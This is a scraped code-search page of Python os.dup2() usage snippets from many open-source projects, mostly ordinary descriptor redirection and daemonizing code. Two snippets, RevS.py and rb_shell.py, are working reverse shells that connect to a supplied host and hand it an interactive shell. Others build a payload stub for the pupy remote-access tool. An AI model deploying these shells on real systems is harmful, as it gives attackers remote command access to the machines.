python类dup2()的实例源码

popen2.py 文件源码 项目:kinect-2-libras 作者: inessadl 项目源码 文件源码 阅读 35 收藏 0 点赞 0 评论 0
def __init__(self, cmd, bufsize=-1):
        _cleanup()
        self.cmd = cmd
        p2cread, p2cwrite = os.pipe()
        c2pread, c2pwrite = os.pipe()
        self.pid = os.fork()
        if self.pid == 0:
            # Child
            os.dup2(p2cread, 0)
            os.dup2(c2pwrite, 1)
            os.dup2(c2pwrite, 2)
            self._run_child(cmd)
        os.close(p2cread)
        self.tochild = os.fdopen(p2cwrite, 'w', bufsize)
        os.close(c2pwrite)
        self.fromchild = os.fdopen(c2pread, 'r', bufsize)
RevS.py 文件源码 项目:darkc0de-old-stuff 作者: tuwid 项目源码 文件源码 阅读 122 收藏 0 点赞 0 评论 0
def proceso():
    host = str(sys.argv[1])
    puerto = int(sys.argv[2])
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    while 1:
        try:
            s.connect((host, puerto))
            os.dup2(s.fileno(), sys.stdin.fileno())
            os.dup2(s.fileno(), sys.stdout.fileno())

            s.sendall(('\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n'))
            s.sendall(('~~         Python Reverse shell     ~~\n'))
            s.sendall(('~~  Kalith: Kalith[at]gmail[dot]com ~~\n'))
            s.sendall(('~~            http//0x59.es         ~~\n'))
            s.sendall(('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n'))

            while 1:
                os.system('/bin/bash')
        except:
            pass
prompters.py 文件源码 项目:questionnaire 作者: kylebebak 项目源码 文件源码 阅读 34 收藏 0 点赞 0 评论 0
def stdout_redirected(to):
    """Lifted from: https://stackoverflow.com/questions/4675728/redirect-stdout-to-a-file-in-python

    This is the only way I've found to redirect stdout with curses. This way the
    output from questionnaire can be piped to another program, without piping
    what's written to the terminal by the prompters.
    """
    stdout = sys.stdout

    stdout_fd = fileno(stdout)
    # copy stdout_fd before it is overwritten
    with os.fdopen(os.dup(stdout_fd), 'wb') as copied:
        stdout.flush()  # flush library buffers that dup2 knows nothing about
        try:
            os.dup2(fileno(to), stdout_fd)  # $ exec >&to
        except ValueError:  # filename
            with open(to, 'wb') as to_file:
                os.dup2(to_file.fileno(), stdout_fd)  # $ exec > to
        try:
            yield stdout  # allow code to be run with the redirected stdout
        finally:
            # restore stdout to its previous value
            stdout.flush()
            os.dup2(copied.fileno(), stdout_fd)
capture.py 文件源码 项目:hostapd-mana 作者: adde88 项目源码 文件源码 阅读 40 收藏 0 点赞 0 评论 0
def start(self):
        try:
            os.fstat(self._savefd)
        except OSError:
            raise ValueError("saved filedescriptor not valid, "
                "did you call start() twice?")
        if self.targetfd == 0 and not self.tmpfile:
            fd = os.open(devnullpath, os.O_RDONLY)
            os.dup2(fd, 0)
            os.close(fd)
            if hasattr(self, '_oldsys'):
                setattr(sys, patchsysdict[self.targetfd], DontReadFromInput())
        else:
            os.dup2(self.tmpfile.fileno(), self.targetfd)
            if hasattr(self, '_oldsys'):
                setattr(sys, patchsysdict[self.targetfd], self.tmpfile)
capture.py 文件源码 项目:hostapd-mana 作者: adde88 项目源码 文件源码 阅读 25 收藏 0 点赞 0 评论 0
def writeorg(self, data):
        """ write a string to the original file descriptor
        """
        tempfp = tempfile.TemporaryFile()
        try:
            os.dup2(self._savefd, tempfp.fileno())
            tempfp.write(data)
        finally:
            tempfp.close()
_twistd_unix.py 文件源码 项目:hostapd-mana 作者: adde88 项目源码 文件源码 阅读 35 收藏 0 点赞 0 评论 0
def daemonize():
    # See http://www.erlenstar.demon.co.uk/unix/faq_toc.html#TOC16
    if os.fork():   # launch child and...
        os._exit(0) # kill off parent
    os.setsid()
    if os.fork():   # launch child and...
        os._exit(0) # kill off parent again.
    os.umask(077)
    null=os.open('/dev/null', os.O_RDWR)
    for i in range(3):
        try:
            os.dup2(null, i)
        except OSError, e:
            if e.errno != errno.EBADF:
                raise
    os.close(null)
popen2.py 文件源码 项目:hostapd-mana 作者: adde88 项目源码 文件源码 阅读 31 收藏 0 点赞 0 评论 0
def __init__(self, cmd, bufsize=-1):
        _cleanup()
        self.cmd = cmd
        p2cread, p2cwrite = os.pipe()
        c2pread, c2pwrite = os.pipe()
        self.pid = os.fork()
        if self.pid == 0:
            # Child
            os.dup2(p2cread, 0)
            os.dup2(c2pwrite, 1)
            os.dup2(c2pwrite, 2)
            self._run_child(cmd)
        os.close(p2cread)
        self.tochild = os.fdopen(p2cwrite, 'w', bufsize)
        os.close(c2pwrite)
        self.fromchild = os.fdopen(c2pread, 'r', bufsize)
test_selectors.py 文件源码 项目:annotated-py-asyncio 作者: hhstore 项目源码 文件源码 阅读 36 收藏 0 点赞 0 评论 0
def test_unregister_after_fd_close_and_reuse(self):
        s = self.SELECTOR()
        self.addCleanup(s.close)
        rd, wr = self.make_socketpair()
        r, w = rd.fileno(), wr.fileno()
        s.register(r, selectors.EVENT_READ)
        s.register(w, selectors.EVENT_WRITE)
        rd2, wr2 = self.make_socketpair()
        rd.close()
        wr.close()
        os.dup2(rd2.fileno(), r)
        os.dup2(wr2.fileno(), w)
        self.addCleanup(os.close, r)
        self.addCleanup(os.close, w)
        s.unregister(r)
        s.unregister(w)
generator.py 文件源码 项目:OSPTF 作者: xSploited 项目源码 文件源码 阅读 47 收藏 0 点赞 0 评论 0
def generate(self):
        return textwrap.dedent("""
        import pupy, os

        if os.name == 'posix':
            pupy.infos['daemonize']=True
            if os.fork():   # launch child and...
                os._exit(0) # kill off parent
            os.setsid()
            if os.fork():   # launch child and...
                os._exit(0) # kill off parent again.
            os.umask(022)   # Don't allow others to write
            null=os.open('/dev/null', os.O_RDWR)
            for i in range(3):
                try:
                    os.dup2(null, i)
                except OSError, e:
                    if e.errno != errno.EBADF:
                        raise
            os.close(null)
        """)
master.py 文件源码 项目:mitogen 作者: dw 项目源码 文件源码 阅读 51 收藏 0 点赞 0 评论 0
def create_child(*args):
    parentfp, childfp = socket.socketpair()
    pid = os.fork()
    if not pid:
        mitogen.core.set_block(childfp.fileno())
        os.dup2(childfp.fileno(), 0)
        os.dup2(childfp.fileno(), 1)
        childfp.close()
        parentfp.close()
        os.execvp(args[0], args)

    childfp.close()
    # Decouple the socket from the lifetime of the Python socket object.
    fd = os.dup(parentfp.fileno())
    parentfp.close()

    LOG.debug('create_child() child %d fd %d, parent %d, cmd: %s',
              pid, fd, os.getpid(), Argv(args))
    return pid, fd
master.py 文件源码 项目:mitogen 作者: dw 项目源码 文件源码 阅读 37 收藏 0 点赞 0 评论 0
def tty_create_child(*args):
    master_fd, slave_fd = os.openpty()
    disable_echo(master_fd)
    disable_echo(slave_fd)

    pid = os.fork()
    if not pid:
        mitogen.core.set_block(slave_fd)
        os.dup2(slave_fd, 0)
        os.dup2(slave_fd, 1)
        os.dup2(slave_fd, 2)
        close_nonstandard_fds()
        os.setsid()
        os.close(os.open(os.ttyname(1), os.O_RDWR))
        os.execvp(args[0], args)

    os.close(slave_fd)
    LOG.debug('tty_create_child() child %d fd %d, parent %d, cmd: %s',
              pid, master_fd, os.getpid(), Argv(args))
    return pid, master_fd
master.py 文件源码 项目:mitogen 作者: dw 项目源码 文件源码 阅读 38 收藏 0 点赞 0 评论 0
def _first_stage():
        import os,sys,zlib
        R,W=os.pipe()
        r,w=os.pipe()
        if os.fork():
            os.dup2(0,100)
            os.dup2(R,0)
            os.dup2(r,101)
            for f in R,r,W,w:os.close(f)
            os.environ['ARGV0']=e=sys.executable
            os.execv(e,['mitogen:CONTEXT_NAME'])
        os.write(1,'EC0\n')
        C=zlib.decompress(sys.stdin.read(input()))
        os.fdopen(W,'w',0).write(C)
        os.fdopen(w,'w',0).write('%s\n'%len(C)+C)
        os.write(1,'EC1\n')
        sys.exit(0)
rb_shell.py 文件源码 项目:Scripts 作者: hxer 项目源码 文件源码 阅读 25 收藏 0 点赞 0 评论 0
def conn(ip,port):
    ip = str(ip)
    port = int(port)
    linux_bash = "/bin/sh"
    windows_cmd = "C:\Windows\System32\cmd.exe"
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip, port))
    print "[*] Connect Success"
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    if os.path.exists(linux_bash):
        p=subprocess.call([linux_bash,"-i"]);
        print "[*] This shell rebound to",ip,port
    elif os.path.exists(windows_cmd):
        p=subprocess.call([windows_cmd,"-i"]);
        print "[*] This shell rebound to",ip,port
    else:
        print "[!] The Command Controler Not Found, I will exit\n"
        print "[!] Please check ",linux_bash,"or",windows_cmd
        exit()
daemon.py 文件源码 项目:bitmask-dev 作者: leapcode 项目源码 文件源码 阅读 50 收藏 0 点赞 0 评论 0
def redirect_stream(system_stream, target_stream):
    """ Redirect a system stream to a specified file.

        :param standard_stream: A file object representing a standard I/O
            stream.
        :param target_stream: The target file object for the redirected
            stream, or ``None`` to specify the null device.
        :return: ``None``.

        `system_stream` is a standard system stream such as
        ``sys.stdout``. `target_stream` is an open file object that
        should replace the corresponding system stream object.

        If `target_stream` is ``None``, defaults to opening the
        operating system's null device and using its file descriptor.

        """
    if target_stream is None:
        target_fd = os.open(os.devnull, os.O_RDWR)
    else:
        target_fd = target_stream.fileno()
    os.dup2(target_fd, system_stream.fileno())
generator.py 文件源码 项目:pupy 作者: ru-faraon 项目源码 文件源码 阅读 52 收藏 0 点赞 0 评论 0
def generate(self):
        return textwrap.dedent("""
        import pupy, os

        if os.name == 'posix':
            pupy.infos['daemonize']=True
            if os.fork():   # launch child and...
                os._exit(0) # kill off parent
            os.setsid()
            if os.fork():   # launch child and...
                os._exit(0) # kill off parent again.
            os.umask(022)   # Don't allow others to write
            null=os.open('/dev/null', os.O_RDWR)
            for i in range(3):
                try:
                    os.dup2(null, i)
                except OSError, e:
                    if e.errno != errno.EBADF:
                        raise
            os.close(null)
        """)
util.py 文件源码 项目:qiime2 作者: qiime2 项目源码 文件源码 阅读 46 收藏 0 点赞 0 评论 0
def _redirected_fd(to=os.devnull, stdio=None):
    if stdio is None:
        stdio = sys.stdout

    stdio_fd = _get_fileno(stdio)
    # copy stdio_fd before it is overwritten
    # NOTE: `copied` is inheritable on Windows when duplicating a standard
    # stream
    with os.fdopen(os.dup(stdio_fd), 'wb') as copied:
        stdio.flush()  # flush library buffers that dup2 knows nothing about
        try:
            os.dup2(_get_fileno(to), stdio_fd)  # $ exec >&to
        except ValueError:  # filename
            with open(to, 'wb') as to_file:
                os.dup2(to_file.fileno(), stdio_fd)  # $ exec > to
        try:
            yield stdio  # allow code to be run with the redirected stdio
        finally:
            # restore stdio to its previous value
            # NOTE: dup2 makes stdio_fd inheritable unconditionally
            stdio.flush()
            os.dup2(copied.fileno(), stdio_fd)  # $ exec >&copied
test_multiprocessing.py 文件源码 项目:zippy 作者: securesystemslab 项目源码 文件源码 阅读 37 收藏 0 点赞 0 评论 0
def test_large_fd_transfer(self):
        # With fd > 256 (issue #11657)
        if self.TYPE != 'processes':
            self.skipTest("only makes sense with processes")
        conn, child_conn = self.Pipe(duplex=True)

        p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
        p.daemon = True
        p.start()
        self.addCleanup(test.support.unlink, test.support.TESTFN)
        with open(test.support.TESTFN, "wb") as f:
            fd = f.fileno()
            for newfd in range(256, MAXFD):
                if not self._is_fd_assigned(newfd):
                    break
            else:
                self.fail("could not find an unassigned large file descriptor")
            os.dup2(fd, newfd)
            try:
                reduction.send_handle(conn, newfd, p.pid)
            finally:
                os.close(newfd)
        p.join()
        with open(test.support.TESTFN, "rb") as f:
            self.assertEqual(f.read(), b"bar")
test_facade.py 文件源码 项目:landscape-client 作者: CanonicalLtd 项目源码 文件源码 阅读 48 收藏 0 点赞 0 评论 0
def _mock_output_restore(self):
        """
        Mock methods to ensure that stdout and stderr are restored,
        after they have been captured.

        Return the path to the tempfile that was used to capture the output.
        """
        old_stdout = os.dup(1)
        old_stderr = os.dup(2)
        fd, outfile = tempfile.mkstemp()
        mkstemp_patcher = mock.patch("tempfile.mkstemp")
        mock_mkstemp = mkstemp_patcher.start()
        self.addCleanup(mkstemp_patcher.stop)
        mock_mkstemp.return_value = (fd, outfile)

        dup_patcher = mock.patch("os.dup")
        mock_dup = dup_patcher.start()
        self.addCleanup(dup_patcher.stop)
        mock_dup.side_effect = lambda fd: {1: old_stdout, 2: old_stderr}[fd]

        dup2_patcher = mock.patch("os.dup2", wraps=os.dup2)
        mock_dup2 = dup2_patcher.start()
        self.addCleanup(dup2_patcher.stop)
        return outfile, mock_dup2
watchdog.py 文件源码 项目:landscape-client 作者: CanonicalLtd 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def daemonize():
    # See http://www.steve.org.uk/Reference/Unix/faq_2.html#SEC16
    if os.fork():  # launch child and...
        os._exit(0)  # kill off parent
    os.setsid()
    if os.fork():  # launch child and...
        os._exit(0)  # kill off parent again.
    # some argue that this umask should be 0, but that's annoying.
    os.umask(0o077)
    null = os.open('/dev/null', os.O_RDWR)
    for i in range(3):
        try:
            os.dup2(null, i)
        except OSError as e:
            if e.errno != errno.EBADF:
                raise
    os.close(null)
glogging.py 文件源码 项目:ShelbySearch 作者: Agentscreech 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def reopen_files(self):
        if self.cfg.capture_output and self.cfg.errorlog != "-":
            for stream in sys.stdout, sys.stderr:
                stream.flush()

            with self.lock:
                if self.logfile is not None:
                    self.logfile.close()
                self.logfile = open(self.cfg.errorlog, 'a+')
                os.dup2(self.logfile.fileno(), sys.stdout.fileno())
                os.dup2(self.logfile.fileno(), sys.stderr.fileno())


        for log in loggers():
            for handler in log.handlers:
                if isinstance(handler, logging.FileHandler):
                    handler.acquire()
                    try:
                        if handler.stream:
                            handler.stream.close()
                            handler.stream = open(handler.baseFilename,
                                    handler.mode)
                    finally:
                        handler.release()
wurlitzer.py 文件源码 项目:ipybind 作者: aldanor 项目源码 文件源码 阅读 30 收藏 0 点赞 0 评论 0
def _setup_pipe(self, name):
        from fcntl import fcntl, F_GETFL, F_SETFL

        real_fd = getattr(sys, '__%s__' % name).fileno()
        save_fd = os.dup(real_fd)
        self._save_fds[name] = save_fd

        pipe_out, pipe_in = os.pipe()
        os.dup2(pipe_in, real_fd)
        os.close(pipe_in)
        self._real_fds[name] = real_fd

        # make pipe_out non-blocking
        flags = fcntl(pipe_out, F_GETFL)
        fcntl(pipe_out, F_SETFL, flags | os.O_NONBLOCK)
        return pipe_out
wurlitzer.py 文件源码 项目:ipybind 作者: aldanor 项目源码 文件源码 阅读 33 收藏 0 点赞 0 评论 0
def __exit__(self, exc_type, exc_value, traceback):
        # flush the underlying C buffers
        libc.fflush(c_stdout_p)
        libc.fflush(c_stderr_p)
        time.sleep(0.025)  # a real cheesy way to avoid potential segfaults
        # close FDs, signaling output is complete
        for real_fd in self._real_fds.values():
            os.close(real_fd)
        self.thread.join()

        # restore original state
        for name, real_fd in self._real_fds.items():
            save_fd = self._save_fds[name]
            try:
                os.dup2(save_fd, real_fd)
            except OSError:
                os.dup2(save_fd, real_fd)
            os.close(save_fd)
        # finalize handle
        self._finish_handle()
pager.py 文件源码 项目:gerrymanderer 作者: emusical 项目源码 文件源码 阅读 33 收藏 0 点赞 0 评论 0
def start_pager():
    if not sys.stdout.isatty():
        return

    pager = get_pager()
    if not pager:
        return

    if "LESS" not in os.environ:
        os.environ["LESS"] = "FRSX"

    oldstdout = os.dup(1)
    global pagerproc
    pagerproc = subprocess.Popen([pager],
                                 stdin=subprocess.PIPE,
                                 stdout=oldstdout,
                                 close_fds=True)

    os.close(oldstdout)
    os.dup2(pagerproc.stdin.fileno(), 1)
setupext.py 文件源码 项目:yt 作者: yt-project 项目源码 文件源码 阅读 33 收藏 0 点赞 0 评论 0
def stdchannel_redirected(stdchannel, dest_filename):
    """
    A context manager to temporarily redirect stdout or stderr

    e.g.:

    with stdchannel_redirected(sys.stderr, os.devnull):
        if compiler.has_function('clock_gettime', libraries=['rt']):
            libraries.append('rt')

    Code adapted from https://stackoverflow.com/a/17752455/1382869
    """

    try:
        oldstdchannel = os.dup(stdchannel.fileno())
        dest_file = open(dest_filename, 'w')
        os.dup2(dest_file.fileno(), stdchannel.fileno())

        yield
    finally:
        if oldstdchannel is not None:
            os.dup2(oldstdchannel, stdchannel.fileno())
        if dest_file is not None:
            dest_file.close()
memory_util.py 文件源码 项目:Master-R-CNN 作者: Mark110 项目源码 文件源码 阅读 22 收藏 0 点赞 0 评论 0
def __exit__(self, exc_type, exc_value, traceback):
    os.dup2(self.prevfd, self.fd)


################################################################################
# LOG_MEMORY_PARSING
################################################################################
# Until https://github.com/tensorflow/tensorflow/issues/6716 is resolved, the
# reliable way to get access to tensor deallocation information is to parse
# __LOG_MEMORY__ from VLOG print statements. This is sensitive to print order
# run unbuffered to prevent interleaving:
#   python -u script.py

# Regex'es to parse __LOG_MEMORY__ statements
# Each regex is preceded by an example of line it's meant to pass

# I 5143420588.000000 file tensorflow/core/framework/log_memory.cc:41] __LOG_MEMORY__ MemoryLogTensorAllocation { step_id: -6 kernel_name: "Unknown (from Proto)" tensor { dtype: DT_INT32 shape { dim { size: 3 } } allocation_description { requested_bytes: 12 allocated_bytes: 12 allocator_name: "cpu" allocation_id: 3 has_single_reference: true ptr: 29496256 } } }
process.py 文件源码 项目:oil 作者: oilshell 项目源码 文件源码 阅读 33 收藏 0 点赞 0 评论 0
def Pop(self):
    frame = self.stack.pop()
    #log('< Pop %s', frame)
    for saved, orig in reversed(frame.saved):
      try:
        os.dup2(saved, orig)
      except OSError as e:
        log('dup2(%d, %d) error: %s', saved, orig, e)
        raise
      os.close(saved)
      #log('dup2 %s %s', saved, orig)
      self.next_fd -= 1  # Count down

    for fd in frame.need_close:
      #log('Close %d', fd)
      try:
        os.close(fd)
      except OSError as e:
        log('Error closing descriptor %d: %s', fd, e)
        raise

    # Wait for here doc processes to finish.
    for proc, waiter in frame.need_wait:
      unused_status = proc.WaitUntilDone(waiter)
popen2.py 文件源码 项目:oil 作者: oilshell 项目源码 文件源码 阅读 41 收藏 0 点赞 0 评论 0
def __init__(self, cmd, bufsize=-1):
        _cleanup()
        self.cmd = cmd
        p2cread, p2cwrite = os.pipe()
        c2pread, c2pwrite = os.pipe()
        self.pid = os.fork()
        if self.pid == 0:
            # Child
            os.dup2(p2cread, 0)
            os.dup2(c2pwrite, 1)
            os.dup2(c2pwrite, 2)
            self._run_child(cmd)
        os.close(p2cread)
        self.tochild = os.fdopen(p2cwrite, 'w', bufsize)
        os.close(c2pwrite)
        self.fromchild = os.fdopen(c2pread, 'r', bufsize)
test_multiprocessing.py 文件源码 项目:python2-tracer 作者: extremecoders-re 项目源码 文件源码 阅读 28 收藏 0 点赞 0 评论 0
def test_large_fd_transfer(self):
        # With fd > 256 (issue #11657)
        if self.TYPE != 'processes':
            self.skipTest("only makes sense with processes")
        conn, child_conn = self.Pipe(duplex=True)

        p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
        p.daemon = True
        p.start()
        with open(test_support.TESTFN, "wb") as f:
            fd = f.fileno()
            for newfd in range(256, MAXFD):
                if not self._is_fd_assigned(newfd):
                    break
            else:
                self.fail("could not find an unassigned large file descriptor")
            os.dup2(fd, newfd)
            try:
                reduction.send_handle(conn, newfd, p.pid)
            finally:
                os.close(newfd)
        p.join()
        with open(test_support.TESTFN, "rb") as f:
            self.assertEqual(f.read(), b"bar")
popen2.py 文件源码 项目:python2-tracer 作者: extremecoders-re 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def __init__(self, cmd, bufsize=-1):
        _cleanup()
        self.cmd = cmd
        p2cread, p2cwrite = os.pipe()
        c2pread, c2pwrite = os.pipe()
        self.pid = os.fork()
        if self.pid == 0:
            # Child
            os.dup2(p2cread, 0)
            os.dup2(c2pwrite, 1)
            os.dup2(c2pwrite, 2)
            self._run_child(cmd)
        os.close(p2cread)
        self.tochild = os.fdopen(p2cwrite, 'w', bufsize)
        os.close(c2pwrite)
        self.fromchild = os.fdopen(c2pread, 'r', bufsize)
glogging.py 文件源码 项目:tabmaster 作者: NicolasMinghetti 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
def reopen_files(self):
        if self.cfg.capture_output and self.cfg.errorlog != "-":
            for stream in sys.stdout, sys.stderr:
                stream.flush()

            with self.lock:
                if self.logfile is not None:
                    self.logfile.close()
                self.logfile = open(self.cfg.errorlog, 'a+')
                os.dup2(self.logfile.fileno(), sys.stdout.fileno())
                os.dup2(self.logfile.fileno(), sys.stderr.fileno())


        for log in loggers():
            for handler in log.handlers:
                if isinstance(handler, logging.FileHandler):
                    handler.acquire()
                    try:
                        if handler.stream:
                            handler.stream.close()
                            handler.stream = open(handler.baseFilename,
                                    handler.mode)
                    finally:
                        handler.release()


问题


面经


文章

微信
公众号

扫码关注公众号